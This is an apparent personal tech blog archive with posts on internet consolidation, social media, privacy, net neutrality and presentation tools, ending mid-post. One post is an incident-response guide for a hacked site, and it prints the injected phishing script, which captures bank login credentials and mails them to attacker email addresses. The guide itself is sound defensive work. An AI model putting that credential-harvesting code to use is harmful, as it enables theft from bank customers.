Chronosynclastic Infundibulum — The world through my prisms (http://www.semanticoverload.com)

Corporate Consolidation in Web 2.0
Sun, 22 Aug 2010 | Semantic Overload

In the 1960s, the USA was host to a huge array of small businesses and stores. They have all but disappeared. The consolidation of corporations into the giants we see now has either gobbled up the mom-and-pop stores or driven them out of business. This started with deregulation under Reagan in the 80s. Next came the deregulation of media in the 90s, which saw
many local TV and radio stations disappear to be replaced by commercial radio stations across the American landscape. I have a strong suspicion that the Internet is next.

[Image source: blindfiveyearold.com]

To clarify what I am talking about, take a look at the recent (and by recent I mean in the last 5 years or so) spate of acquisitions by all the big players in the Internet business (both hardware and software): Intel acquired McAfee; Google acquired Like.com (and before that YouTube, Blogger, Writely, and many more); Oracle acquired AmberPoint and Secerno; Yahoo recently acquired Koprol and citizensports.com; Microsoft acquired Sentillion and Opalis, among many others; Apple recently acquired Quattro, Lala Media, Intrinsity, and Siri; and Cisco has made over 48 acquisitions in the last decade, followed by IBM with 35 [source].

This is just the tip of the iceberg, and if it is any indicator of things to come, then you can expect such large-scale consolidation to leave Internet services and infrastructure in the hands of very few large players. This, coupled with Google's betrayal on net neutrality, makes for an ominous prediction.

Increasingly, it looks like the best hope of an Internet startup is to be acquired by one of these giants, because otherwise it risks being drowned out by an 'add-on' service offered by them (sometimes for free). A great example is Facebook Places and Google Places vs. Gowalla, Foursquare, and their kind. So all the mom-and-pop-store equivalents of Web 2.0 are now being consolidated into Google, Yahoo, Facebook, Intel, Oracle, Cisco, and a few others.

So why is this bad? To get an idea of where this is going to leave us, take a look at what happened with the deregulation of radio and TV stations in the US. You can't get decent coverage of local news and happenings anywhere except a few major cities; everywhere else, local coverage is spotty. Local musicians now have to go to the major recording and music capitals of the nation just to be heard on the radio in their own home town. As a member of a local community radio station, I know how difficult things have become for independent radio broadcasters.

Expect something similar for the web. Expect to lose the rich and diverse sources of information and entertainment you are used to receiving from the web. It may not happen this year, or even in the next 5 years. But in the next decade, the web is going to be far less free than you see it today. The corporations want it that way, and that is how it will stay because the politicians won’t vote otherwise.

Welcome to Web 3.0 :-)

On the maturation of social media
Wed, 11 Aug 2010 | Semantic Overload

In this recent article, Newsweek claims that traditional social media like blogs, and upcoming ones like Twitter, are on the decline because we as a people are simply too lazy and won't do something for free [hat tip: Patrix]. Newsweek has really embarrassed itself with this post. Let me explain how.

First, let us examine the evidence that Newsweek provides for the decline in social media.

  1. Wikimedia, after prolific crowdsourced contributions to Wikipedia until 2009, is now having to recruit contributors and editors.
  2. According to Technorati, professional bloggers are on the rise whereas hobbyist bloggers (like yours truly) are on the decline. 95% of blogs are abandoned in the first month. A recent Pew study found that blogging has withered as a pastime, with the number of 18- to 24-year-olds who identify themselves as bloggers declining by half between 2006 and 2009.
  3. Although Twitter is adding users at an astounding rate, 90 percent of tweets come from 10 percent of users, according to a 2009 Harvard study. Between 60 and 70 percent of people signing up for Twitter quit within a month, according to a recent Nielsen report.
  4. While Digg won readers, it struggled to sign up voters and has been forced to change its format to something similar to social networking sites like Facebook.

Based on this evidence, the article concludes that (a) traditional social media and citizen journalism are on the decline (the only kind of social media on the rise is the kind that allows people to connect with each other), and (b) the underlying reason is that people are too lazy to do anything for free. Do you see the disconnect in logic and reasoning here?

Novelty Factor

First, the author of the article chooses to completely ignore the 'novelty' factor that we are all subject to. Remember Beanie Babies? How about the Slinky? They were wildly popular when they first came out, but not anymore. Is that because people got too lazy to play with them? Of course not! It's the novelty factor. When people see something new, it piques their interest, and exploring it is a reward unto itself. So people tend to use it to understand it. Once the novelty factor wears off, only the hardcore fans and professionals occupy the niche. This explains everything from the Slinky and Beanie Babies to blogs and Twitter. I am surprised that the article did not make that connection.

Knowledge Generation and Gatekeepers

Second, how is Wikimedia's recruiting of professionals a bad thing, even for social media? Knowledge validity is not subject to democracy. Evolution does not become untrue simply because a majority of our population chooses to be Bible thumpers. If Wikimedia intends to be taken seriously as a repository of human knowledge, it needs gatekeepers and knowledge-generation agents who are proficient in their respective areas and disciplines. This ensures that crowdsourced information and knowledge is validated before it pollutes the repository.

Blogging Bubble

Third, the article seems to assume that everyone who started a blog started it with the intention of generating information to be shared with everyone. This is simply not true (see my earlier point about the novelty factor). In fact, I will hazard to assert that a vast majority of the people who blog do not do it to generate more information for the benefit of others. I will go on to claim that it is blogs like these that tend to be abandoned. Therefore, no harm, no foul. It's not too different from an economic bubble, really. Much like the housing bubble gave people an unrealistic estimate of the value of real estate, the 'blogging bubble' (the phenomenon of everyone on the street having a blog of their own) gave people an inflated idea of the amount of information being generated by the blogosphere. The blogging bubble has now burst, and the 'decline' or 'stagnation' we see now is the intrinsic value of the information generated by the blogosphere all along.

Not everyone wants to generate, aggregate, and share information. That is perfectly fine. If you have everyone generating information, who is there to consume, process, and utilize it?

Social Cliques

Fourth, when it comes to platforms like Digg, they started with the premise that if a lot of people "dig" something, then the odds are that a lot more people will be interested in the information that has been "dug". As it turns out, the premise is not entirely accurate. People are members of relatively small cliques, and the value of the same piece of information varies from one clique to another. Digg recognized this and has taken steps to reorganize the site to align with this empirical observation. That does not mean that social media is on the decline. It simply means that we are using social media differently.

Motivation for Cognitive Tasks

The article also talks about putting rewards in place to encourage participation on sites like Gawker and Huffington Post, and then makes a snide remark about the next step being offering money. Obviously Newsweek is ignorant of Dan Pink's presentation on what motivates people. The bottom line is that money is not a motivator for cognitive tasks (in fact, it can be a de-motivator). Most of traditional social media is about performing cognitive tasks to generate and collate information.

As a counterexample, consider Linux, an open-source operating system. It has thousands of contributors who work for free to create a product and then give that product away for free! That's not too different from the many bloggers who blog for free and let anyone read their blog for free. It's not too different from Wikimedia contributors adding and editing articles. Linux and the open-source movement are as strong as ever. So why should blogs and Wikimedia be any different?

Then what about the data and statistics that the article presented? Well, they simply say that a whole bunch of people jumped on the bandwagon for all the wrong reasons and are now getting off. But there are still a sufficient number of individuals left to carry on the movement.

So yeah, the blogosphere is maturing, Wikimedia is maturing, not dying. All that means is that from now on, the only people who will get onto traditional social media are the ones who see intrinsic value in participating, and I am pretty confident there will be plenty of them. Think Linux, think open source. This is no different.

My interview on Information Underground with Teddy Wilson on KEOS 89.1FM
Mon, 09 Aug 2010 | Semantic Overload

I was on the radio show Information Underground with Teddy Wilson on KEOS 89.1FM Bryan/College Station. We discussed blogging, bloggers, the blogosphere, their influence on mainstream media, and the future of blogging.
Here is the entire radio show, sourced from BlogTalkRadio:
[Embedded audio: Teddy on KEOS on Blog Talk Radio]
Social Media: on why Obama won and Palin won't
Sun, 08 Aug 2010 | Semantic Overload

Obama's unprecedented use of social media as a critical marketing and canvassing tool to enable his historic victory in the 2008 presidential race has been dissected and beaten to death. I am not here to resurrect that zombie. However, I will take a singular incident from his campaign to illustrate my point (that is, why Obama won and Palin won't).

The incident I am talking about was cited by Clay Shirky in this TED video on "How social media can make history." The incident is as follows: Obama's campaign started a portal, http://my.barackobama.com, for all of Obama's supporters to gather and discuss issues related to the campaign, organization, marketing, and Obama's platform itself. Now, in January 2008 Obama had announced that he was against the FISA amendment that allowed warrantless wiretapping, but in mid-summer 2008 he reversed his position and said that he would support the FISA amendment. Predictably, there was a huge outcry against this reversal among his supporters; they thronged to the discussion forum on http://my.barackobama.com, voiced their concerns, and asked Obama not to support the FISA amendment. The outcry was so loud that Obama had to release a statement that essentially said: he has heard his supporters loud and clear; his position is based on his assessment of the amendment; the reasons for which he supports it still stand; so he will continue to support the bill and take the hit from his supporters on this one.

Naturally, his supporters weren't happy. But later there was a realization among his supporters that although Obama didn't agree with them, he never tried to shut them up. There was no censoring of dissenting opinions. There was no banning of people who didn't like his position or platform. This mature treatment of social media as an extension of democracy and free speech ensured that he did not lose his support base.

Now, fast forward to the present day. No political public figure is more prolific on social media than Sarah Palin. She has over 2 million supporters on her Facebook page. Strangely, the comments on her Facebook page are, for the most part, a lavish outpouring of admiration, encouragement, support, and agreement. There are very few dissenting opinions, if any at all. All this seemed fishy to John Dickerson of Slate, so he and his colleague Jeremy Singer-Vine decided to find out what was really going on. Singer-Vine wrote a program to track deletions of comments on Sarah Palin's Facebook page and found that the "wall" on her page was being sanitized through heavy censorship, to the point of frustration among her supporters. Naturally, the comments expressing such frustrations were deleted as well. For example: "Why are the few comments expressing disagreement with this endorsement being deleted?" wrote one. "Just because some of us disagree with the endorsement doesn't mean that we don't follow Sarah Palin." That was deleted too.

Such censorship is almost guaranteed to backfire on Palin. For a public figure running for office, the way one treats one's supporters is strongly indicative of how one will treat one's constituents, and everyone, including supporters, realizes this. This is why Obama's supporters didn't abandon him over the FISA vote, and why there is a very good chance that Palin's supporters will desert her.

If a tree falls in the forest…
Thu, 05 Aug 2010 | Semantic Overload

"If a tree falls in the forest and there is no one to hear it, does it still make a sound?" This, in essence, is the issue of privacy. If a specific action (or piece of information) is observable (even after the fact) by no one but the actor, then that act (or information) is, by definition, private. The actor could potentially be a single individual or a cohort. Now, because we are in the so-called "information age", increasingly greater portions of our actions and our information are becoming observable. Unfortunately, very few of us realize this, so many actions that we thought were private are not, and this is getting a lot of people into hot water. Naturally, there is a backlash, and the resulting turbulence is now presenting itself in all its glory all over the Internet.

Even though there is a lot of noise about privacy issues, there isn't really anyone with a clear picture of where things are, where they will be heading, where they should be heading, and how we as individuals can adapt to these changes. I think the problem is one of methodology. People are trying to solve new-age problems with old-age tools; it's not going to work. In this post, I attempt to explain what I mean.

Fatalists and conservatives. Let us take a look at the two major camps on the issue of privacy today. On one side you have the likes of Mark Zuckerberg, David Thomson, and Samy Kamkar, who believe that privacy is dead (the fatalists); on the other side you have the likes of the Future of Privacy Forum and Bruce Schneier, who believe that maintaining our privacy is only a matter of setting up the right legal/economic framework of incentives and disincentives within the present (and future) context (the conservatives).

Both camps have valid points. Despite all the brouhaha about privacy issues with Facebook, Facebook continues to add more users, and current users continue to treat Facebook as the repository of their social life and social interactions. So maybe privacy really is dead! But the very fact that there is such a backlash reveals a fissure in society: there is a significant faction that jealously guards many of its actions and its information, but finds that it is not able to maintain its privacy because 'other entities' (friends, banks, credit card companies, and such) are making them public. And there are still others who simply do not realize that what they think is private really is not. So the question is: what is the state of the art on this issue?

Privacy vs. Security. The first problem you encounter when trying to answer that question is that there is no common understanding of what privacy really is. Often people bleed their concerns about security into the issue of privacy. This muddies the waters to the point where no coherent narrative emerges. While security is, and should always be, a grave concern, it is an orthogonal issue to privacy. One possible consequence of a loss of privacy is that the security of our property and resources is in jeopardy, but that is not a basis to conflate privacy with security. There should be separate discussions on each issue. They may complement each other, but one is no substitute for the other. Remember, a secure life does not guarantee a private life!

Privacy through public obscurity. Now that we know we are talking exclusively about privacy and not security, we can move forward. In the past, privacy was protected largely by technological limitations that made several tasks intractable. Such intractability led to privacy through public obscurity. For example, before the advent of the telegraph and telephone, there was very little to worry about in terms of information about your activities (that you deem private) reaching your relatives in a different state. Why? Because of what I like to call the Chinese-Whispers effect. But that changed with the ubiquity of telephones. Similarly, before the advent of the internet, at any point in your life you were free to 'reinvent' yourself by simply moving to a new town, getting a new job, and simply not citing individuals from your old life as references. There was very little anyone could reasonably do to dig up your past life (of course, you could always hire a private eye, but that would constitute an unreasonable effort).

In fact, the privacy of your online communications with your bank is established by privacy through public obscurity. Worried? Don't be, not for now at least. All 'secure' online communications use what is called public-key cryptography, which involves dealing with numbers that have 100-200 digit prime numbers as their factors and encrypting messages with these numbers. In order to decrypt the message, one has to be able to factorize the large number into its constituent large prime numbers. The fastest mechanism to date for factorizing such a number is still essentially brute force, and hence intractable. Even for the fastest computers, this task could take years, by which time the contents of your private communication will (hopefully) be irrelevant. Thus, privacy through public obscurity.
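
To make this concrete, here is a toy sketch of the public-key idea in PHP, using the textbook RSA numbers. This is purely illustrative: the primes are tiny stand-ins for the hundreds-of-digits primes used in practice, and nothing below is remotely secure.

<?php
// Toy RSA sketch -- illustration only, NOT secure.
function power_mod($base, $exp, $mod) {
    // Square-and-multiply modular exponentiation.
    $result = 1;
    $base = $base % $mod;
    while ($exp > 0) {
        if ($exp % 2 == 1) {
            $result = ($result * $base) % $mod;
        }
        $exp = intdiv($exp, 2);
        $base = ($base * $base) % $mod;
    }
    return $result;
}

$p = 61; $q = 53;  // the secret prime factors
$n = $p * $q;      // public modulus (3233); factorizing it reveals the key
$e = 17;           // public exponent
$d = 2753;         // private exponent: (e * d) mod ((p-1)*(q-1)) == 1

$message = 65;
$cipher = power_mod($message, $e, $n); // anyone can encrypt with (n, e)
$plain  = power_mod($cipher, $d, $n);  // only the holder of d can decrypt
echo "cipher: $cipher, recovered: $plain\n"; // cipher: 2790, recovered: 65
?>

The entire scheme rests on the fact that recovering $p and $q from $n is intractable once $n is large enough; with a 4-digit modulus like the one above, any laptop can break it instantly.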

I bring up the example of public-key encryption for a reason: the task of factorizing large numbers, although intractable right now, might not be so in the future (not because computers get faster, but because either quantum computers become a reality, or the answer to the famous P=NP problem in computer science turns out to be in the affirmative). If that happens, what do you think society's response will be? Would you expect two camps: one that says cryptography is dead, and another that says all mechanisms to factorize numbers should be outlawed or disincentivised somehow? Of course not. That's an absurd proposition! The response will be to build a better cryptographic technique that works despite the state of the art.

We are facing a similar situation with privacy today, and the two camps I referred to earlier are not helping. The fact remains that, these days, more often than not someone is hearing the tree fall in the forest, and so more trees are making a sound when they fall. So how do we deal with it?

First, learn to give up some of your privacy. Technology has made a lot of tasks tractable, and our physical and mental abilities and faculties are not evolving at a rate that matches the pace of technology. Consequently, we are not able to make all our actions intractable to the new technology. So we have to give up some of our privacy. While this may be a ghastly notion for people in the western hemisphere, it is surprisingly common for societies in the eastern hemisphere to trade privacy for social support structure, security, and (more controversially) happiness. Much as we have given up privacy for air travel but not for bus or train journeys, we may have to give up privacy in certain aspects of our lives that we had otherwise considered private.

As for the natural follow-up question (which aspects of our privacy do we have to give up?), I honestly don't know. My speculations and proposals here are of a methodological nature. I am not answering questions. I am just trying to figure out what the right questions to ask are! Isn't that the first step in arriving at a resolution to our privacy issues?

Second, indulge in information overload. The less information you give out, the more useful every extra bit of information about you becomes. Inevitably, despite your best efforts, more information about you will leak out. So how do you counter that? With information overload. Take Hasan Elahi as a classic example. After he was erroneously put on the FBI terrorist watch list, and had to endure gruelling questioning by the FBI that took up hours of his time, ultimately to no one's benefit, he decided to turn the tables on the FBI. He put up a website called Tracking Transience where he has put up pictures, videos, and all sorts of evidence of where he has been and what he has been doing, every hour of every day! Since there is already so much information about him available, any additional information about him is not so useful anymore. Curiously, he doesn't appear in any of these photographs. He is the one behind the camera. So in a sense, although he has given you so much information about him, he really hasn't given you anything that is remarkably useful. Paradoxically, by revealing so much about himself online, he has secured his privacy. [For details, visit: http://memes.org/tracking-transience-hasan-elahi]

OK, so Tracking Transience works for Hasan; what about the rest of us? Again, I am only showing you where to begin asking the right questions; I do not have answers for you.

Are there any more tools of this or a different kind that we can employ? Arguably, yes. One needs to look harder, and look in different places. The new tools are different in kind and are, presumably, in an ironic twist, an artefact of the very technology that precipitated the issue of privacy in the first place.

In conclusion, my argument is simply that you cannot use the old tools of fatalism, legal recourse, and economic regulation to frame the privacy debate and expect a resolution. They are simply the wrong tools for the job! I will wrap this post up by continuing the metaphor with which I started: if the tree falls in the forest and there are people to hear it, then let them hear it, but make sure that every minute sound made by the tree, and by the trees around it, is perpetually amplified and broadcast, to the point where the sound made by the falling tree becomes noise and is simply irrelevant!

If your site has been compromised with phishing attack code…
Tue, 17 Mar 2009 | Semantic Overload

I recently received the following email:

To whom it may concern:

Please be aware that Wachovia Corporation (“Wachovia”) is the owner of numerous United States and foreign trade marks and services marks used in connection with its financial services and products (the “Wachovia Marks”), including the Wachovia wordmark and Wachovia logo.  Wachovia has expended substantial resources to advertise and promote its products and services under the marks and considers the marks to be valuable assets of Wachovia.

It has come to our attention that your company is hosting a known active phishing site.  The active phishing site displays the Wachovia Marks and is intended to defraud customers in an attempt to capture and use their identity.  Network Whois records indicate the IP address of the phishing site is registered to your Internet space.

Accordingly, we request that your site bring down the Phishing web site at:
<< http://<my website>/home/plugins/editors-xtd/confirm.html >>

So that's how I learned that my site had been compromised by hackers and that phishing attack code had been injected into it. If this happens to you, do you know what the right thing to do is? How do you fix it? Well, here is what I did, and I think it is worthwhile to share this information so that it may be useful to others. So here goes.

Step 1. Disable Your Site

First, disable your site; bring it down temporarily. The last thing you want is for more people to be scammed by the hacker who compromised your site. You can do that by disabling all access to all the files within your website. If the website is running on Unix/Linux you can do a "chmod -R 000 <website-home-directory>" (refer to the chmod tutorial here). For those using cPanel, go to the file manager and change the permissions of the document root for the website.
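
If you have no shell access, a rough PHP equivalent of the recursive chmod is sketched below (the path is a placeholder; point it at your own document root). Note that each directory is locked only after its contents have been processed, so the recursion can still read it on the way down.

<?php
// A sketch of "chmod -R 000 <website-home-directory>" in PHP, for hosts
// without shell access.
function lock_down($dir) {
    $entries = scandir($dir);
    if ($entries !== false) {
        foreach ($entries as $entry) {
            if ($entry === '.' || $entry === '..') {
                continue;
            }
            $path = $dir . '/' . $entry;
            if (is_dir($path)) {
                lock_down($path); // descend first, while still readable
            } else {
                chmod($path, 0000);
            }
        }
    }
    chmod($dir, 0000); // lock the directory itself last
}
lock_down('/home/youruser/public_html'); // placeholder path
?>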

Step 2. Investigate the Offending Webpage

Now that no more unsuspecting users can be affected by this phishing attack, we can dig into the offending webpage that is causing the problem. In my case it was: http://<my website>/home/plugins/editors-xtd/confirm.html

I opened up the HTML file, and this is what I saw:

……

<html xmlns="http://www.w3.org/1999/xhtml"><head>

<title>Wachovia – Personal Finance and Business Financial Services</title>

……

Clearly, someone was impersonating the Wachovia website. Now, with phishing, someone is trying to steal your username and password by impersonating some credible website that requires your username and password to get into. In HTML, this is typically accomplished through 'forms', which start with a '<form>' tag. So I dug through the code, and I saw two form tags.

The first one was:

<form method="get" action="http://search.wachovia.com/selfservice/microsites/wachoviaSearchEntry.do?" name="searchForm" onsubmit="return verifyQuery(this.searchString);">

…..

This looks fine, because the 'action' parameter points to http://search.wachovia.com/selfservice..., which is a search script on the Wachovia website. So anyone filling out this form is sending their data to the Wachovia website, and the hacker will not get any information from it.

Now to the second form tag:

<form method="post" action="screen.php" name="uidAuthForm" id="uidAuthForm" onsubmit="return submitLogin(this)">

……

Aha! The smoking gun! Why? Well, look at the 'action' parameter in this 'form' tag: it says 'screen.php', which is clearly not a script on the Wachovia servers, but something hosted on my website! So the hackers installed another script on my system to phish for usernames and passwords. Next, I went to see what was inside this 'screen.php' file, which is located in the same directory as the 'confirm.html' file we have been looking at so far.

Step 3. Isolate the Script Doing the Actual Phishing and Find the Offenders

So I open up the ‘screen.php’ file and this is what I find:

<?php

$ip = getenv("REMOTE_ADDR");
$datamasii=date("D M d, Y g:i a");
$userid = $HTTP_POST_VARS["userid"];
$password = $HTTP_POST_VARS["password"];
$mesaj = "Hello
userid : $userid
password : $password
——–0WN3d By Louis—————-
IP : $ip
DATE : $datamasii
";

$recipient = "cashbug5010@gmail.com,smithgreen@hotmail.com";
$subject = "Take What U need But Make Sure U Cash It Out !!!";

mail($recipient,$subject,$mesaj);
mail($to,$subject,$mesaj);
header("Location: http://www.wachovia.com/helpcenter/0,,,00.html");
?>

So here we are! Gotcha! Check out the line '$recipient = "cashbug5010@gmail.com,smithgreen@hotmail.com";'. Clearly, the phished credentials were being mailed to the following two email addresses: cashbug5010@gmail.com and smithgreen@hotmail.com. Now that I had this much information, what next?

Step 4. Inform the Authorities

We give this information to the authorities who can carry the investigation forward. And who are they? First, reply to the email address that alerted you to the phishing attack (do a 'reply all' if there were multiple recipients/CCs on the email you received). Also, copy phishing-report@us-cert.gov and cert@cert.org on this email, and give them a copy of the phishing code (in this case, the file 'screen.php') and the offending email addresses you found.

For now, that is all you can do; just cooperate with the authorities if they need more information.

Step 5. Quarantine the Malicious Code and Restore Your Website

Quarantine the offending files (by setting their permissions to '000'). Now that the code has been quarantined, you can bring your website up again by setting the permissions back to what they were earlier (except for the offending code).

DO NOT DELETE THE MALICIOUS CODE: IT IS EVIDENCE OF THE PHISHING ATTACK AND EXONERATES YOU! Otherwise, the authorities may pursue you as an accessory to the crime!

Step 6. Inform Google That Your Site is Safe Again

Note that the odds are that Google has already put out a notice against your site as a source of a phishing attack. So go to the following URL, http://www.google.com/safebrowsing/report_error/, to let Google know that the problem has been taken care of and your site is safe again.

And that's all you can do for the moment. Make sure your site is secure and that you haven't made any of your directories writable by anyone except you. As for preventing future security breaches, it is always a cat-and-mouse game, with the hackers and the likes of you each trying to stay smarter and better than the other.
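
As a starting point for that audit, here is a minimal PHP sketch (the path is a placeholder) that lists anything world-writable under your web root; world-writable files and directories are a common way such injections get in.

<?php
// List world-writable files and directories under the web root.
$root = '/home/youruser/public_html'; // placeholder path
$iter = new RecursiveIteratorIterator(
    new RecursiveDirectoryIterator($root, FilesystemIterator::SKIP_DOTS),
    RecursiveIteratorIterator::SELF_FIRST
);
foreach ($iter as $item) {
    $perms = fileperms($item->getPathname());
    if ($perms & 0002) { // the world-writable bit is set
        printf("%04o %s\n", $perms & 07777, $item->getPathname());
    }
}
?>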

Rajani ka Ishtyle
Wed, 03 Sep 2008 | Semantic Overload

[Embedded video: Rajani in Castrol Power 1 Commercial]

Net Neutrality: what is it really about?
Fri, 25 Apr 2008 | Semantic Overload

Net neutrality has been an ongoing debate for quite a few years now. In its simplest terms, net neutrality is a principle stating that all traffic on the internet must be treated the same way; that there should be no preferential treatment for a specific kind or class of traffic. There are many camps for and against net neutrality. Each group fervently advocates its position on the issue while slinging mud at the other camp. This debate has polarized large sections of stakeholders on the internet. Unfortunately, most of the polarization is based more on propaganda and prejudice than on facts. Investigating the net neutrality issue reveals that the waters are indeed quite muddy.

The groups supporting net neutrality — like the SaveTheInternet.com Coalition — argue that net neutrality is fundamental to the success of the internet. Net neutrality prevents ISPs from speeding up or slowing down Web content based on its source, ownership, or destination. If ISPs are allowed to slow some web content down and speed other content up based on Service Level Agreements (SLAs) with content providers (like Reuters, Fox News, Yahoo, Google, Facebook, etc.), then this will result in all the big corporations signing SLAs with all the ISPs, while individual content providers like bloggers are left out in the cold, with little that can be done against such discrimination. In essence, the advocates argue that net neutrality is an extension of free speech and is necessary to protect free speech on the internet. Other implications of not having net neutrality include ISPs allowing (say) Google's pages to load faster than (say) Yahoo's (because Google signed an SLA with the ISP), thus denying users efficient access to their trusted source of information.

The groups opposing net neutrality — like the Hands Off The Internet coalition — argue that heavy regulation of the internet runs against free-market economics, and that such restrictions slow down the rate of innovation on the internet. They argue that different kinds of internet traffic have different requirements. For instance, live chat requires little bandwidth, but its traffic cannot be delayed; streaming video, on the other hand, requires high bandwidth but can afford some delay because the video is buffered at the viewing computer; downloads can withstand occasional delays and low bandwidth. It makes sense to treat each of these traffic streams differently in order to provide a better user experience, but net neutrality prohibits this.

Let's see how the arguments for and against net neutrality really stand up to criticism.

Now, if net neutrality were implemented as a strict regulation, it could give rise to a lot of problems. For instance, how do network providers treat spam under net neutrality? Currently, network providers can block spam at the entry point into their network. If networks are expected to treat all traffic equally, then they have to treat spam the same as other traffic, which implies they bear the cost of routing spam on their networks with no income from it. Guess who they will pass that cost on to: the consumers. So is net neutrality really what consumers want?

If customers subscribe to a pay-per-view service over the internet, then they have every right to a guaranteed, satisfactory viewing experience. However, the network provider cannot deliver that under net neutrality, because the provider is not allowed to allocate bandwidth for the pay-per-view service. So is net neutrality really helping?

On the other hand, if net neutrality weren't implemented, network providers could treat different kinds of traffic differently, thus providing a better user experience. But if that were truly an issue, then how do different classes of network traffic work well today without so-called 'tiered' services? Answer: there is more bandwidth in the network core than the traffic consumes. As long as there is good admission control at the edge of the Internet, it doesn't seem like you need such 'tiered' services. Doesn't that make the 'tiered' services argument rather weak?

Consider the competition between VoIP services and traditional phone lines. Typically, your phone providers are also ISPs. And VoIP is very sensitive to delays in traffic, more so than web browsing, streaming video, or downloads. So if the ISPs wanted to discourage their customers from using VoIP services, they could do so by simply delaying packets for a few seconds at random. For web browsing and other services, this would only show up as a few seconds' delay in a page loading, or a delay in a video starting, which is easily tolerable. But with VoIP, it would show up as jitter in a voice call, making VoIP unusable. Don't we need regulations to protect customers from such practices? Isn't net neutrality a way out of this?

So net neutrality, while addressing some issues, opens up other problems that the Internet community will have to deal with. Worse, while it is easy to make a regulation like net neutrality, it is very difficult to enforce it. How do you detect a violation of net neutrality? If 'bad' ISPs are smart enough, they can hoodwink any mechanism for detecting such violations. Tactics can range from delaying all traffic for a few seconds so that only VoIP services are affected, to dropping only certain kinds of traffic during periods of congestion. These two techniques are indistinguishable from situations where a 'good' ISP is having traffic management problems and is forced to delay traffic, or forced to drop traffic during congestion. So how do you distinguish the 'bad' ISPs from the 'good' ones and penalize only the 'bad' ones? It's not always possible.

So, if net neutrality is more a regulation in theory than something that can be enforced successfully, and people do realize this, then why do we have groups advocating for it so strongly? What could be gained from it, other than a rhetorical stand on the ideals they strive for? The answer might surprise you.

Ironically, the arguments being made on both sides of the net neutrality debate fail to address the real issue. In fact, they serve to hide the reason net neutrality has become such a focal point of conflict on the internet today. To understand this better, let's see who the corporate entities involved in the net neutrality debate are. The supporters of net neutrality include the likes of Google, Yahoo, eBay, and AeA. The opponents of net neutrality include the likes of 3M, Cisco Systems, Qualcomm, Verizon, AT&T, and Time Warner. Note that there is a clear division in the functional roles of each camp: the camp that supports net neutrality consists of content providers, whereas the camp that opposes it consists of network infrastructure providers.

Why do content providers like net neutrality? Because it allows them to innovate and come up with new applications and solutions without having to worry about how those applications will be treated by the network. Why do network infrastructure providers oppose net neutrality? Because its absence would allow for innovation and diversity in network infrastructure to accommodate the new applications and solutions that evolve on the Internet. What does this mean? It means that net neutrality is no longer about free speech, or democracy, or free markets, or any ideals. It is all about who gets to control the internet and the innovation in it. Net neutrality, under the hood, is an ongoing battle between content providers and infrastructure providers over who controls the web and the innovation in it.

Making Your Presentations Portable
Mon, 21 Apr 2008 | Semantic Overload

I had the following problem(s):

  • I had a fairly large presentation that I had to share among several people for review.
  • Not everyone was running the same version of PowerPoint, and not everyone used Windows.
  • People who couldn't make it to my actual presentation wanted to be able to view it (along with the voice narration) later.
  • I wanted it to be accessible and usable by everyone regardless of the OS, the browser, or the presentation software they were using.

I figured this was a pretty common problem that many people face, and that a documented solution would be nice. More so since someone I demonstrated this solution to now swears by it and can't thank me enough. So I figured, why not spread the knowledge :) (Unfortunately, this solution works only if you are using Windows XP/Vista. Sorry, I couldn't find the right tools to make it work on Mac OS X.)

Here’s the bird’s eye view of my solution:

  1. Prep your presentation to be made 'complete' and 'kiosk-ready'.
  2. Download and install AuthorPoint Lite.
  3. Import the presentation into AuthorPoint Lite, preserving the rehearsed timings, animations, and (optionally) narration.
  4. Convert the presentation to Flash using AuthorPoint Lite.
  5. Upload the generated SWF file online for the world to see!
  6. The End.

Prepping your presentation

Before you can make a presentation portable, you have to make sure that the presentation itself has enough information in it to be portable. You also have to ensure that the presentation has been configured so that the tools you will use to make it portable can take advantage of it.

So here’s how you would go about the job:

Ensure all information is available

When you make a presentation portable, more often than not the people who access it will not have the luxury of you walking them through it. So make sure you have notes for each slide, so the presentation is understandable on its own, even without the speaker present. It is often a good idea to include the text of your narration for each slide in the Slide Notes section.

Recording Narration

You also have the option of recording your narration. You can do this if you would like people to be able to view and hear your presentation online. In order to record your narration (assuming you have a working microphone), you need to do the following:

  • Ensure that you have no automatic animations set. You can do that as follows:
    1. Click on the Slide Show menu and choose Custom Animation.
    2. Click on the first item in the Animation Order box on the Order & Timing tab.
    3. Select the On Mouse Click radio button under Start Animation, as shown in the figure below. [Figure: Unset Custom Animation]
  • Test your microphone by opening Slide Show -> Record Narration -> Set Microphone Level. You'll see the Microphone Check dialog box pop up. Set the level appropriately. [Figure: Testing Microphone]
  • You can adjust the sound quality if you like. [Figure: Adjust Sound Quality]
  • DO NOT check the 'Link the Narrations' checkbox! Leaving this option unchecked is very important for portability!
  • Now start recording your narration, and manually click through the slides (and animations) as you narrate into the microphone. You can stop anytime by pressing [Esc]. After you reach the last slide, or after you press [Esc], PowerPoint will ask if you'd like to save the slide timings. Click No. [Figure: Save Slide Timings dialog]
  • Now you can browse through the slides and review your narration by clicking on the sound icon. You can delete the narration on any slide and re-record it if necessary.

Rehearsing Timing

Click on the Slide Show menu and choose Rehearse Timings. You'll immediately be transferred into Slideshow View, and the narration will begin. You'll see a Rehearsal toolbar appear:

[Figure: Rehearsal toolbar]

Advance through the presentation by moving to the next slide when the narration for each slide is complete. Also make sure that you step through the animations appropriately. When you've scrolled through the entire presentation, PowerPoint will again ask if you'd like to save the timings. Click Yes.

Now your presentation is self-contained and complete. However, it is still a .ppt file. To make it portable, you need to convert it to a more portable format. My choice is the Shockwave Flash (SWF) format.

AuthorPoint Lite

AuthorPoint Lite is a free PowerPoint-to-Flash converter. The neat thing about this software is that it can import all the settings from a PowerPoint presentation, including narration, rehearsed timings, custom animations, etc. Here is a great review of AuthorPoint Lite.

  • Download and install AuthorPoint Lite.
  • Import your presentation into AuthorPoint Lite.
  • Save it as an SWF file.

Uploading the SWF file

Now upload the saved SWF file to your web server and provide a link to it on your website. This SWF file is your presentation, complete with your narration, animations, slide timings, slide notes, etc. And the best part is that since it's an SWF file, any browser with a Flash plugin can play it! Truly portable!
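
If you'd rather embed the presentation in a page than just link to it, a snippet along these lines should work (the file name and dimensions are placeholders):

<object type="application/x-shockwave-flash" data="presentation.swf"
        width="800" height="600">
  <param name="movie" value="presentation.swf" />
  Your browser needs the Flash plugin to view this presentation.
</object>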

Enjoy

The End

:)

Gmail with IMAP — First Impressions
Mon, 05 Nov 2007 | Semantic Overload

Finally, over a week and a half after the initial announcement, IMAP was enabled on all my Gmail accounts. Until now I used POP to access my email from Gmail, and had to use the 'recent:' option to be able to access my email from multiple locations. With IMAP, thankfully, that will change soon.

A quick intro to IMAP. As described by Tom Spring from PC World:

